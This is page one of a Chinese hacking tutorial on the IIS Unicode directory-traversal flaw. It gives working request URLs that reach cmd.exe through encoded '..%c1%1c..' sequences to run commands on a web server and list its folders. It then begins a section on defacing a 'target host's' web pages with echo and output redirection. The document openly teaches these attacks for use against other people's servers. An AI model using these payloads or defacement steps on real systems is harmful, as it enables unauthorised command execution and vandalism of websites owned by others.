黑客技巧--深入UNICODE编码漏洞(三)
·
badboy·
1 2 下一页 在攻略2里我提到至于对aa bb这样中间带有空格的文件夹怎么看,目前我还不知道,如果谁知道可以写出来。
通过对dos的8.3规则的补习,终于弄明白怎么看aa bb文件夹了方法就是以下http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~1
aa bb=aabb~1
如果同目录下还有aab b文件夹,就用这样的代码看aab b文件夹里的内容http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20e:\aabb~2
依此类推。
四、如何简单地修改目标主机的web页面
一般情况下,我们要修改目标主机的web文件,常用到的方法是利用echo回显、管道工具> >>。
先复习一下这些命令和管道工具的功能。
D:\>echo/?
显示信息,或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数,可以显示当前的 ECHO 设置。
管道工具> >>的功能
"> >>" 是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中.
>>产生的内容将追加进文件中,>则将原文件内容覆盖。
再看看cmd/?里面的部分内容:
请注意,如果字符串有引号,可以接受用命令分隔符 ‘&&‘ 隔开的多个命令。并且,由于兼容原因,/X 与 /E:ON 相同,/Y 与/E:OFF 相同,并且 /R 与 /C 相同。忽略任何其它命令选项。
如果指定了 /C 或 /K,命令选项后的命令行其余部分将作为命令行处理;在这种情况下,会使用下列逻辑处理引号字符("):
1. 如果符合下列所有条件,那么在命令行上的引号字符将被保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特殊字符,特殊字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文件的名称。
1 2 下一页 |
